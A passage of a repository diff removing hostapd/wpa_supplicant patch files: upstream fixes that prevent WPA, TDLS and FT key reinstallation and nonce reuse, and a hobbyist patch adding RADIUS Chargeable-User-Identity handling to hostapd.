+{
+ if (random_get_bytes(sm->ANonce, WPA_NONCE_LEN)) {
+ wpa_printf(MSG_ERROR,
+ "WPA: Failed to get random data for ANonce");
+ sm->Disconnect = TRUE;
+ return -1;
+ }
+ wpa_hexdump(MSG_DEBUG, "WPA: Assign new ANonce", sm->ANonce,
+ WPA_NONCE_LEN);
+ sm->TimeoutCtr = 0;
+ return 0;
+}
+
+
SM_STATE(WPA_PTK, INITPMK)
{
u8 msk[2 * PMK_LEN];
@@ -2458,9 +2473,12 @@ SM_STEP(WPA_PTK)
SM_ENTER(WPA_PTK, AUTHENTICATION);
else if (sm->ReAuthenticationRequest)
SM_ENTER(WPA_PTK, AUTHENTICATION2);
- else if (sm->PTKRequest)
- SM_ENTER(WPA_PTK, PTKSTART);
- else switch (sm->wpa_ptk_state) {
+ else if (sm->PTKRequest) {
+ if (wpa_auth_sm_ptk_update(sm) < 0)
+ SM_ENTER(WPA_PTK, DISCONNECTED);
+ else
+ SM_ENTER(WPA_PTK, PTKSTART);
+ } else switch (sm->wpa_ptk_state) {
case WPA_PTK_INITIALIZE:
break;
case WPA_PTK_DISCONNECT:
--
2.7.4


@ -1,132 +0,0 @@
From 6c4bed4f47d1960ec04981a9d50e5076aea5223d Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Fri, 22 Sep 2017 11:03:15 +0300
Subject: [PATCH 6/8] TDLS: Reject TPK-TK reconfiguration
Do not try to reconfigure the same TPK-TK to the driver after it has
been successfully configured. This is an explicit check to avoid issues
related to resetting the TX/RX packet number. There was already a check
for this for TPK M2 (retries of that message are ignored completely), so
that behavior does not get modified.
For TPK M3, the TPK-TK could have been reconfigured, but that was
followed by immediate teardown of the link due to an issue in updating
the STA entry. Furthermore, for TDLS with any real security (i.e.,
ignoring open/WEP), the TPK message exchange is protected on the AP path
and simple replay attacks are not feasible.
As an additional corner case, make sure the local nonce gets updated if
the peer uses a very unlikely "random nonce" of all zeros.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/rsn_supp/tdls.c | 38 ++++++++++++++++++++++++++++++++++++--
1 file changed, 36 insertions(+), 2 deletions(-)
diff --git a/src/rsn_supp/tdls.c b/src/rsn_supp/tdls.c
index e424168..9eb9738 100644
--- a/src/rsn_supp/tdls.c
+++ b/src/rsn_supp/tdls.c
@@ -112,6 +112,7 @@ struct wpa_tdls_peer {
u8 tk[16]; /* TPK-TK; assuming only CCMP will be used */
} tpk;
int tpk_set;
+ int tk_set; /* TPK-TK configured to the driver */
int tpk_success;
int tpk_in_progress;
@@ -192,6 +193,20 @@ static int wpa_tdls_set_key(struct wpa_sm *sm, struct wpa_tdls_peer *peer)
u8 rsc[6];
enum wpa_alg alg;
+ if (peer->tk_set) {
+ /*
+ * This same TPK-TK has already been configured to the driver
+ * and this new configuration attempt (likely due to an
+ * unexpected retransmitted frame) would result in clearing
+ * the TX/RX sequence number which can break security, so must
+ * not allow that to happen.
+ */
+ wpa_printf(MSG_INFO, "TDLS: TPK-TK for the peer " MACSTR
+ " has already been configured to the driver - do not reconfigure",
+ MAC2STR(peer->addr));
+ return -1;
+ }
+
os_memset(rsc, 0, 6);
switch (peer->cipher) {
@@ -209,12 +224,15 @@ static int wpa_tdls_set_key(struct wpa_sm *sm, struct wpa_tdls_peer *peer)
return -1;
}
+ wpa_printf(MSG_DEBUG, "TDLS: Configure pairwise key for peer " MACSTR,
+ MAC2STR(peer->addr));
if (wpa_sm_set_key(sm, alg, peer->addr, -1, 1,
rsc, sizeof(rsc), peer->tpk.tk, key_len) < 0) {
wpa_printf(MSG_WARNING, "TDLS: Failed to set TPK to the "
"driver");
return -1;
}
+ peer->tk_set = 1;
return 0;
}
@@ -696,7 +714,7 @@ static void wpa_tdls_peer_clear(struct wpa_sm *sm, struct wpa_tdls_peer *peer)
peer->cipher = 0;
peer->qos_info = 0;
peer->wmm_capable = 0;
- peer->tpk_set = peer->tpk_success = 0;
+ peer->tk_set = peer->tpk_set = peer->tpk_success = 0;
peer->chan_switch_enabled = 0;
os_memset(&peer->tpk, 0, sizeof(peer->tpk));
os_memset(peer->inonce, 0, WPA_NONCE_LEN);
@@ -1159,6 +1177,7 @@ skip_rsnie:
wpa_tdls_peer_free(sm, peer);
return -1;
}
+ peer->tk_set = 0; /* A new nonce results in a new TK */
wpa_hexdump(MSG_DEBUG, "TDLS: Initiator Nonce for TPK handshake",
peer->inonce, WPA_NONCE_LEN);
os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
@@ -1751,6 +1770,19 @@ static int wpa_tdls_addset_peer(struct wpa_sm *sm, struct wpa_tdls_peer *peer,
}
+static int tdls_nonce_set(const u8 *nonce)
+{
+ int i;
+
+ for (i = 0; i < WPA_NONCE_LEN; i++) {
+ if (nonce[i])
+ return 1;
+ }
+
+ return 0;
+}
+
+
static int wpa_tdls_process_tpk_m1(struct wpa_sm *sm, const u8 *src_addr,
const u8 *buf, size_t len)
{
@@ -2004,7 +2036,8 @@ skip_rsn:
peer->rsnie_i_len = kde.rsn_ie_len;
peer->cipher = cipher;
- if (os_memcmp(peer->inonce, ftie->Snonce, WPA_NONCE_LEN) != 0) {
+ if (os_memcmp(peer->inonce, ftie->Snonce, WPA_NONCE_LEN) != 0 ||
+ !tdls_nonce_set(peer->inonce)) {
/*
* There is no point in updating the RNonce for every obtained
* TPK M1 frame (e.g., retransmission due to timeout) with the
@@ -2020,6 +2053,7 @@ skip_rsn:
"TDLS: Failed to get random data for responder nonce");
goto error;
}
+ peer->tk_set = 0; /* A new nonce results in a new TK */
}
#if 0
--
2.7.4


@ -1,82 +0,0 @@
From b372ab0b7daea719749194dc554b26e6367603f2 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Fri, 22 Sep 2017 12:06:37 +0300
Subject: [PATCH 8/8] FT: Do not allow multiple Reassociation Response frames
The driver is expected to not report a second association event without
the station having explicitly request a new association. As such, this
case should not be reachable. However, since reconfiguring the same
pairwise or group keys to the driver could result in nonce reuse issues,
be extra careful here and do an additional state check to avoid this
even if the local driver ends up somehow accepting an unexpected
Reassociation Response frame.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/rsn_supp/wpa.c | 3 +++
src/rsn_supp/wpa_ft.c | 8 ++++++++
src/rsn_supp/wpa_i.h | 1 +
3 files changed, 12 insertions(+)
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 0550a41..2a53c6f 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -2440,6 +2440,9 @@ void wpa_sm_notify_disassoc(struct wpa_sm *sm)
#ifdef CONFIG_TDLS
wpa_tdls_disassoc(sm);
#endif /* CONFIG_TDLS */
+#ifdef CONFIG_IEEE80211R
+ sm->ft_reassoc_completed = 0;
+#endif /* CONFIG_IEEE80211R */
/* Keys are not needed in the WPA state machine anymore */
wpa_sm_drop_sa(sm);
diff --git a/src/rsn_supp/wpa_ft.c b/src/rsn_supp/wpa_ft.c
index 205793e..d45bb45 100644
--- a/src/rsn_supp/wpa_ft.c
+++ b/src/rsn_supp/wpa_ft.c
@@ -153,6 +153,7 @@ static u8 * wpa_ft_gen_req_ies(struct wpa_sm *sm, size_t *len,
u16 capab;
sm->ft_completed = 0;
+ sm->ft_reassoc_completed = 0;
buf_len = 2 + sizeof(struct rsn_mdie) + 2 + sizeof(struct rsn_ftie) +
2 + sm->r0kh_id_len + ric_ies_len + 100;
@@ -681,6 +682,11 @@ int wpa_ft_validate_reassoc_resp(struct wpa_sm *sm, const u8 *ies,
return -1;
}
+ if (sm->ft_reassoc_completed) {
+ wpa_printf(MSG_DEBUG, "FT: Reassociation has already been completed for this FT protocol instance - ignore unexpected retransmission");
+ return 0;
+ }
+
if (wpa_ft_parse_ies(ies, ies_len, &parse) < 0) {
wpa_printf(MSG_DEBUG, "FT: Failed to parse IEs");
return -1;
@@ -781,6 +787,8 @@ int wpa_ft_validate_reassoc_resp(struct wpa_sm *sm, const u8 *ies,
return -1;
}
+ sm->ft_reassoc_completed = 1;
+
if (wpa_ft_process_gtk_subelem(sm, parse.gtk, parse.gtk_len) < 0)
return -1;
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index 41f371f..56f88dc 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -128,6 +128,7 @@ struct wpa_sm {
size_t r0kh_id_len;
u8 r1kh_id[FT_R1KH_ID_LEN];
int ft_completed;
+ int ft_reassoc_completed;
int over_the_ds_in_progress;
u8 target_ap[ETH_ALEN]; /* over-the-DS target AP */
int set_ptk_after_assoc;
--
2.7.4


@ -1,451 +0,0 @@
diff -rupN hostapd-0.7.3/src/ap/accounting.c src/ap/accounting.c
--- hostapd-0.7.3/src/ap/accounting.c 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/accounting.c 2011-09-06 21:01:36.000000000 -0700
@@ -24,6 +24,7 @@
#include "ap_config.h"
#include "sta_info.h"
#include "accounting.h"
+/*#include "eapol_auth/eapol_auth_sm_i.h"*/
/* Default interval in seconds for polling TX/RX octets from the driver if
@@ -43,7 +44,10 @@ static struct radius_msg * accounting_ms
char buf[128];
u8 *val;
size_t len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI Attribute length*/
int i;
+ struct eapol_state_machine *sm = sta->eapol_sm;
msg = radius_msg_new(RADIUS_CODE_ACCOUNTING_REQUEST,
radius_client_get_id(hapd->radius));
@@ -82,7 +86,9 @@ static struct radius_msg * accounting_ms
if (sta) {
val = ieee802_1x_get_identity(sta->eapol_sm, &len);
+ printf("GOT ID\n");
if (!val) {
+
os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
MAC2STR(sta->addr));
val = (u8 *) buf;
@@ -94,6 +100,30 @@ static struct radius_msg * accounting_ms
printf("Could not add User-Name\n");
goto fail;
}
+
+
+ /*Check if the CUI attribute is set, if so returns the TRUE or FALSE accordingly**************/
+ if (getSetCui(sta->eapol_sm)){
+ cui=get_CUI (sta->eapol_sm, &cui_len);
+ printf("GOT CUI\n");
+
+ if (!cui) {
+
+ os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
+ MAC2STR(sta->addr));
+ cui = (u8 *) buf;
+ cui_len = os_strlen(buf);
+ }
+ if (!radius_msg_add_attr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, cui,
+ cui_len)) { /*Add CUI attribute to the Accounting Request Message*/
+ printf("Could not add CUI\n");
+ goto fail;
+ }
+ /********************/
+ }
+ /*else { */
+ /* printf ("PROBLEM IN IF\n");*/
+ /*}*/
}
if (hapd->conf->own_ip_addr.af == AF_INET &&
diff -rupN hostapd-0.7.3/src/ap/accounting.h src/ap/accounting.h
--- hostapd-0.7.3/src/ap/accounting.h 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/accounting.h 2011-07-25 19:26:06.000000000 -0700
@@ -22,6 +22,7 @@ static inline void accounting_sta_start(
{
}
+
static inline void accounting_sta_stop(struct hostapd_data *hapd,
struct sta_info *sta)
{
diff -rupN hostapd-0.7.3/src/ap/ieee802_1x.c src/ap/ieee802_1x.c
--- hostapd-0.7.3/src/ap/ieee802_1x.c 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/ieee802_1x.c 2011-09-06 20:59:54.000000000 -0700
@@ -899,6 +899,7 @@ void ieee802_1x_new_station(struct hosta
* re-authentication without having to wait for the
* Supplicant to send EAPOL-Start.
*/
+ printf("REAUTHENTICATION-EAPOL");
sta->eapol_sm->reAuthenticate = TRUE;
}
eapol_auth_step(sta->eapol_sm);
@@ -1138,6 +1139,68 @@ static void ieee802_1x_update_sta_identi
sm->identity_len = len;
}
+/* This method is used to Set the CUI attribute Value**************************************/
+static void set_cui(struct hostapd_data *hapd,
+ struct sta_info *sta,
+ struct radius_msg *msg)
+
+{
+ u8 *buf,*cui_identity;
+ size_t len;
+ struct eapol_state_machine *sm = sta->eapol_sm;
+
+ if (sm == NULL)
+ return;
+
+ if (radius_msg_get_attr_ptr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, &buf, &len,
+ NULL) < 0)
+ return;
+ cui_identity = os_malloc(len + 1);
+ if (cui_identity == NULL)
+ return;
+ os_memcpy(cui_identity, buf, len);
+ cui_identity[len] = '\0';
+
+ sm->cui = cui_identity;
+ sm->cui_len = len;
+ printf(" SET CUI %s",(char *) cui_identity);
+
+
+}
+
+
+/* **************************************/
+
+/*check CUI attribute is available in Access Accept */
+static void check_cuiAttr (struct radius_msg *msg,struct sta_info *sta, struct hostapd_data *hapd)
+{
+
+ struct eapol_state_machine *sm = sta->eapol_sm; /*Define a pointer to eapol_state_machine*/
+
+
+ size_t i;
+
+ for (i = 0;i<msg->attr_used;i++)
+ { struct radius_attr_hdr *attr = radius_get_attr_hdr(msg, i);
+ if (attr->type == RADIUS_ATTR_CHARGEABLE_USER_IDENTITY) /*check CUI attribute is availabe in Access-Accept packet*/
+ {
+ printf("CUI Attribute is Available");
+ sm->cuiAvailable = TRUE;
+ set_cui(hapd, sta, msg);
+ break;
+
+ }
+ else {
+ sm->cuiAvailable = FALSE;
+ printf ("CUI is not available in this packet");
+
+ }
+
+
+ }
+
+}
+
struct sta_id_search {
u8 identifier;
@@ -1298,6 +1361,8 @@ ieee802_1x_receive_auth(struct radius_ms
shared_secret_len);
ieee802_1x_store_radius_class(hapd, sta, msg);
ieee802_1x_update_sta_identity(hapd, sta, msg);
+ /*set_cui(hapd, sta, msg);*/
+ check_cuiAttr (msg,sta,hapd);
if (sm->eap_if->eapKeyAvailable &&
wpa_auth_pmksa_add(sta->wpa_sm, sm->eapol_key_crypt,
session_timeout_set ?
@@ -1777,6 +1842,27 @@ u8 * ieee802_1x_get_identity(struct eapo
}
+
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len) /* return CUI Attribute Value ******************************/
+{
+ if (sm == NULL || sm->identity == NULL)
+ return NULL;
+
+ *len = sm->cui_len;
+ return sm->cui;
+}
+
+Boolean getSetCui (struct eapol_state_machine *sm) /*Check if the CUI value is set or not, and returns TRUE or FALSE accordingly*/
+
+{ if (sm->cuiAvailable)
+ return TRUE;
+else
+ return FALSE;
+ }
+
+/*****************************/
+
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx)
{
diff -rupN hostapd-0.7.3/src/ap/ieee802_1x.h src/ap/ieee802_1x.h
--- hostapd-0.7.3/src/ap/ieee802_1x.h 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/ieee802_1x.h 2011-07-25 19:43:10.000000000 -0700
@@ -69,6 +69,13 @@ void ieee802_1x_deinit(struct hostapd_da
int ieee802_1x_tx_status(struct hostapd_data *hapd, struct sta_info *sta,
const u8 *buf, size_t len, int ack);
u8 * ieee802_1x_get_identity(struct eapol_state_machine *sm, size_t *len);
+
+/** definig CUI get function */
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len);
+Boolean getSetCui (struct eapol_state_machine *sm);
+
+/*********************/
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx);
const u8 * ieee802_1x_get_key(struct eapol_state_machine *sm, size_t *len);
diff -rupN hostapd-0.7.3/src/ap/pmksa_cache_auth.c src/ap/pmksa_cache_auth.c
--- hostapd-0.7.3/src/ap/pmksa_cache_auth.c 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/pmksa_cache_auth.c 2011-09-06 22:42:00.000000000 -0700
@@ -142,6 +142,20 @@ static void pmksa_cache_from_eapol_data(
}
}
+/*set to cui in to cache*/
+
+ if (eapol ->cui) {
+
+ entry ->cui = os_malloc(eapol->cui_len); /*Allocate memory for CUI attribute*/
+ if (entry->cui) {
+ entry->cui_len = eapol->cui_len;
+ os_memcpy(entry->cui, eapol->cui,
+ eapol->cui_len);
+ }
+ }
+
+/*set to cui in to cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_copy_class(&entry->radius_class, &eapol->radius_class);
#endif /* CONFIG_NO_RADIUS */
@@ -169,6 +183,25 @@ void pmksa_cache_to_eapol_data(struct rs
eapol->identity, eapol->identity_len);
}
+/*Added to get CUI from the cache*/
+
+
+ if (entry->cui) {
+ os_free(eapol->cui);
+
+ eapol->cui = os_malloc(entry->cui_len);
+ eapol->cuiAvailable=TRUE;
+ if (eapol->cui) {
+ eapol->cui_len = entry->cui_len;
+ os_memcpy(eapol->cui, entry->cui,
+ entry->cui_len); /*copy the CUI attribute value to EAPOL data structure*/
+ }
+ wpa_hexdump_ascii(MSG_DEBUG, "CUIfrom PMKSA",
+ eapol->cui, eapol->cui_len);
+ }
+
+ /*Added to get CUI from the cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_free_class(&eapol->radius_class);
radius_copy_class(&eapol->radius_class, &entry->radius_class);
@@ -180,6 +213,7 @@ void pmksa_cache_to_eapol_data(struct rs
eapol->eap_type_authsrv = entry->eap_type_authsrv;
((struct sta_info *) eapol->sta)->vlan_id = entry->vlan_id;
+ printf ("GETTING CACHE ENTRY\n");
}
diff -rupN hostapd-0.7.3/src/ap/pmksa_cache_auth.h src/ap/pmksa_cache_auth.h
--- hostapd-0.7.3/src/ap/pmksa_cache_auth.h 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/pmksa_cache_auth.h 2011-08-07 19:19:44.000000000 -0700
@@ -31,6 +31,8 @@ struct rsn_pmksa_cache_entry {
u8 *identity;
size_t identity_len;
+ u8 *cui; /* cui by me*/
+ size_t cui_len; /*Size of the cached cui by me*/
struct radius_class_data radius_class;
u8 eap_type_authsrv;
int vlan_id;
diff -rupN hostapd-0.7.3/src/common/ieee802_11_common.c src/common/ieee802_11_common.c
--- hostapd-0.7.3/src/common/ieee802_11_common.c 2010-09-07 08:43:39.000000000 -0700
+++ src/common/ieee802_11_common.c 2011-07-25 17:56:38.000000000 -0700
@@ -31,8 +31,8 @@ static int ieee802_11_parse_vendor_speci
if (elen < 4) {
if (show_errors) {
wpa_printf(MSG_MSGDUMP, "short vendor specific "
- "information element ignored (len=%lu)",
- (unsigned long) elen);
+ "information element ignored (len=%lu)",
+ (unsigned long) elen);
}
return -1;
}
diff -rupN hostapd-0.7.3/src/eapol_auth/eapol_auth_sm_i.h src/eapol_auth/eapol_auth_sm_i.h
--- hostapd-0.7.3/src/eapol_auth/eapol_auth_sm_i.h 2010-09-07 08:43:39.000000000 -0700
+++ src/eapol_auth/eapol_auth_sm_i.h 2011-09-06 20:43:46.000000000 -0700
@@ -75,6 +75,7 @@ struct eapol_state_machine {
/* variables */
Boolean eapolLogoff;
Boolean eapolStart;
+ Boolean cuiAvailable; /*to check CUI is available in AcessAccept*/
PortTypes portMode;
unsigned int reAuthCount;
/* constants */
@@ -159,6 +160,8 @@ struct eapol_state_machine {
u8 last_eap_id; /* last used EAP Identifier */
u8 *identity;
size_t identity_len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI attribute length*/
u8 eap_type_authsrv; /* EAP type of the last EAP packet from
* Authentication server */
u8 eap_type_supp; /* EAP type of the last EAP packet from Supplicant */
diff -rupN hostapd-0.7.3/src/radius/radius.c src/radius/radius.c
--- hostapd-0.7.3/src/radius/radius.c 2010-09-07 08:43:39.000000000 -0700
+++ src/radius/radius.c 2011-07-25 18:41:30.000000000 -0700
@@ -24,16 +24,16 @@
/**
* struct radius_msg - RADIUS message structure for new and parsed messages
*/
-struct radius_msg {
+//struct radius_msg {
/**
* buf - Allocated buffer for RADIUS message
*/
- struct wpabuf *buf;
+ //struct wpabuf *buf;
/**
* hdr - Pointer to the RADIUS header in buf
*/
- struct radius_hdr *hdr;
+ //struct radius_hdr *hdr;
/**
* attr_pos - Array of indexes to attributes
@@ -41,18 +41,18 @@ struct radius_msg {
* The values are number of bytes from buf to the beginning of
* struct radius_attr_hdr.
*/
- size_t *attr_pos;
+ //size_t *attr_pos;
/**
* attr_size - Total size of the attribute pointer array
*/
- size_t attr_size;
+ //size_t attr_size;
/**
* attr_used - Total number of attributes in the array
*/
- size_t attr_used;
-};
+ //size_t attr_used;
+//};
struct radius_hdr * radius_msg_get_hdr(struct radius_msg *msg)
@@ -66,7 +66,7 @@ struct wpabuf * radius_msg_get_buf(struc
return msg->buf;
}
-
+/*
static struct radius_attr_hdr *
radius_get_attr_hdr(struct radius_msg *msg, int idx)
{
@@ -74,7 +74,7 @@ radius_get_attr_hdr(struct radius_msg *m
(wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
}
-
+*/
static void radius_msg_set_hdr(struct radius_msg *msg, u8 code, u8 identifier)
{
msg->hdr->code = code;
diff -rupN hostapd-0.7.3/src/radius/radius.h src/radius/radius.h
--- hostapd-0.7.3/src/radius/radius.h 2010-09-07 08:43:39.000000000 -0700
+++ src/radius/radius.h 2011-07-25 18:44:42.000000000 -0700
@@ -21,6 +21,45 @@
#pragma pack(push, 1)
#endif /* _MSC_VER */
+/************************/
+struct radius_msg {
+ /**
+ * buf - Allocated buffer for RADIUS message
+ */
+ struct wpabuf *buf;
+
+ /**
+ * hdr - Pointer to the RADIUS header in buf
+ */
+ struct radius_hdr *hdr;
+
+ /**
+ * attr_pos - Array of indexes to attributes
+ *
+ * The values are number of bytes from buf to the beginning of
+ * struct radius_attr_hdr.
+ */
+ size_t *attr_pos;
+
+ /**
+ * attr_size - Total size of the attribute pointer array
+ */
+ size_t attr_size;
+
+ /**
+ * attr_used - Total number of attributes in the array
+ */
+ size_t attr_used;
+};
+
+
+
+
+/***********************/
+
+
+
+
struct radius_hdr {
u8 code;
u8 identifier;
@@ -201,6 +240,10 @@ void radius_msg_finish_acct(struct radiu
size_t secret_len);
struct radius_attr_hdr * radius_msg_add_attr(struct radius_msg *msg, u8 type,
const u8 *data, size_t data_len);
+
+/****************************/
+
+/*****************************/
struct radius_msg * radius_msg_parse(const u8 *data, size_t len);
int radius_msg_add_eap(struct radius_msg *msg, const u8 *data,
size_t data_len);
@@ -238,7 +281,13 @@ static inline int radius_msg_add_attr_in
u32 val = htonl(value);
return radius_msg_add_attr(msg, type, (u8 *) &val, 4) != NULL;
}
-
+/**********************/
+static struct radius_attr_hdr * radius_get_attr_hdr(struct radius_msg *msg, int idx)
+{
+ return (struct radius_attr_hdr *)
+ (wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
+}
+/**************************/
static inline int radius_msg_get_attr_int32(struct radius_msg *msg, u8 type,
u32 *value)
{


@ -1,451 +0,0 @@
diff -urN hostapd-1.0.orig//src/ap/accounting.c hostapd-1.0/src/ap/accounting.c
--- hostapd-1.0.orig//src/ap/accounting.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/accounting.c 2012-07-17 18:40:21.000000000 +0800
@@ -25,6 +25,7 @@
#include "sta_info.h"
#include "ap_drv_ops.h"
#include "accounting.h"
+/*#include "eapol_auth/eapol_auth_sm_i.h"*/
/* Default interval in seconds for polling TX/RX octets from the driver if
@@ -44,7 +45,10 @@
char buf[128];
u8 *val;
size_t len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI Attribute length*/
int i;
+ struct eapol_state_machine *sm = sta->eapol_sm;
msg = radius_msg_new(RADIUS_CODE_ACCOUNTING_REQUEST,
radius_client_get_id(hapd->radius));
@@ -83,7 +87,9 @@
if (sta) {
val = ieee802_1x_get_identity(sta->eapol_sm, &len);
+ printf("GOT ID\n");
if (!val) {
+
os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
MAC2STR(sta->addr));
val = (u8 *) buf;
@@ -95,6 +101,30 @@
printf("Could not add User-Name\n");
goto fail;
}
+
+
+ /*Check if the CUI attribute is set, if so returns the TRUE or FALSE accordingly**************/
+ if (getSetCui(sta->eapol_sm)){
+ cui=get_CUI (sta->eapol_sm, &cui_len);
+ printf("GOT CUI\n");
+
+ if (!cui) {
+
+ os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
+ MAC2STR(sta->addr));
+ cui = (u8 *) buf;
+ cui_len = os_strlen(buf);
+ }
+ if (!radius_msg_add_attr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, cui,
+ cui_len)) { /*Add CUI attribute to the Accounting Request Message*/
+ printf("Could not add CUI\n");
+ goto fail;
+ }
+ /********************/
+ }
+ /*else { */
+ /* printf ("PROBLEM IN IF\n");*/
+ /*}*/
}
if (hapd->conf->own_ip_addr.af == AF_INET &&
diff -urN hostapd-1.0.orig//src/ap/accounting.h hostapd-1.0/src/ap/accounting.h
--- hostapd-1.0.orig//src/ap/accounting.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/accounting.h 2012-07-17 18:40:21.000000000 +0800
@@ -22,6 +22,7 @@
{
}
+
static inline void accounting_sta_stop(struct hostapd_data *hapd,
struct sta_info *sta)
{
diff -urN hostapd-1.0.orig//src/ap/ieee802_1x.c hostapd-1.0/src/ap/ieee802_1x.c
--- hostapd-1.0.orig//src/ap/ieee802_1x.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/ieee802_1x.c 2012-07-17 18:40:21.000000000 +0800
@@ -966,6 +966,7 @@
* re-authentication without having to wait for the
* Supplicant to send EAPOL-Start.
*/
+ printf("REAUTHENTICATION-EAPOL");
sta->eapol_sm->reAuthenticate = TRUE;
}
eapol_auth_step(sta->eapol_sm);
@@ -1205,6 +1206,68 @@
sm->identity_len = len;
}
+/* This method is used to Set the CUI attribute Value**************************************/
+static void set_cui(struct hostapd_data *hapd,
+ struct sta_info *sta,
+ struct radius_msg *msg)
+
+{
+ u8 *buf,*cui_identity;
+ size_t len;
+ struct eapol_state_machine *sm = sta->eapol_sm;
+
+ if (sm == NULL)
+ return;
+
+ if (radius_msg_get_attr_ptr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, &buf, &len,
+ NULL) < 0)
+ return;
+ cui_identity = os_malloc(len + 1);
+ if (cui_identity == NULL)
+ return;
+ os_memcpy(cui_identity, buf, len);
+ cui_identity[len] = '\0';
+
+ sm->cui = cui_identity;
+ sm->cui_len = len;
+ printf(" SET CUI %s",(char *) cui_identity);
+
+
+}
+
+
+/* **************************************/
+
+/*check CUI attribute is available in Access Accept */
+static void check_cuiAttr (struct radius_msg *msg,struct sta_info *sta, struct hostapd_data *hapd)
+{
+
+ struct eapol_state_machine *sm = sta->eapol_sm; /*Define a pointer to eapol_state_machine*/
+
+
+ size_t i;
+
+ for (i = 0;i<msg->attr_used;i++)
+ { struct radius_attr_hdr *attr = radius_get_attr_hdr(msg, i);
+ if (attr->type == RADIUS_ATTR_CHARGEABLE_USER_IDENTITY) /*check CUI attribute is availabe in Access-Accept packet*/
+ {
+ printf("CUI Attribute is Available");
+ sm->cuiAvailable = TRUE;
+ set_cui(hapd, sta, msg);
+ break;
+
+ }
+ else {
+ sm->cuiAvailable = FALSE;
+ printf ("CUI is not available in this packet");
+
+ }
+
+
+ }
+
+}
+
struct sta_id_search {
u8 identifier;
@@ -1365,6 +1428,8 @@
shared_secret_len);
ieee802_1x_store_radius_class(hapd, sta, msg);
ieee802_1x_update_sta_identity(hapd, sta, msg);
+ /*set_cui(hapd, sta, msg);*/
+ check_cuiAttr (msg,sta,hapd);
if (sm->eap_if->eapKeyAvailable &&
wpa_auth_pmksa_add(sta->wpa_sm, sm->eapol_key_crypt,
session_timeout_set ?
@@ -1859,6 +1924,27 @@
}
+
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len) /* return CUI Attribute Value ******************************/
+{
+ if (sm == NULL || sm->identity == NULL)
+ return NULL;
+
+ *len = sm->cui_len;
+ return sm->cui;
+}
+
+Boolean getSetCui (struct eapol_state_machine *sm) /*Check if the CUI value is set or not, and returns TRUE or FALSE accordingly*/
+
+{ if (sm->cuiAvailable)
+ return TRUE;
+else
+ return FALSE;
+ }
+
+/*****************************/
+
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx)
{
diff -urN hostapd-1.0.orig//src/ap/ieee802_1x.h hostapd-1.0/src/ap/ieee802_1x.h
--- hostapd-1.0.orig//src/ap/ieee802_1x.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/ieee802_1x.h 2012-07-17 18:40:21.000000000 +0800
@@ -69,6 +69,13 @@
int ieee802_1x_tx_status(struct hostapd_data *hapd, struct sta_info *sta,
const u8 *buf, size_t len, int ack);
u8 * ieee802_1x_get_identity(struct eapol_state_machine *sm, size_t *len);
+
+/** definig CUI get function */
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len);
+Boolean getSetCui (struct eapol_state_machine *sm);
+
+/*********************/
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx);
const u8 * ieee802_1x_get_key(struct eapol_state_machine *sm, size_t *len);
diff -urN hostapd-1.0.orig//src/ap/pmksa_cache_auth.c hostapd-1.0/src/ap/pmksa_cache_auth.c
--- hostapd-1.0.orig//src/ap/pmksa_cache_auth.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/pmksa_cache_auth.c 2012-07-17 18:40:21.000000000 +0800
@@ -142,6 +142,20 @@
}
}
+/*set to cui in to cache*/
+
+ if (eapol ->cui) {
+
+ entry ->cui = os_malloc(eapol->cui_len); /*Allocate memory for CUI attribute*/
+ if (entry->cui) {
+ entry->cui_len = eapol->cui_len;
+ os_memcpy(entry->cui, eapol->cui,
+ eapol->cui_len);
+ }
+ }
+
+/*set to cui in to cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_copy_class(&entry->radius_class, &eapol->radius_class);
#endif /* CONFIG_NO_RADIUS */
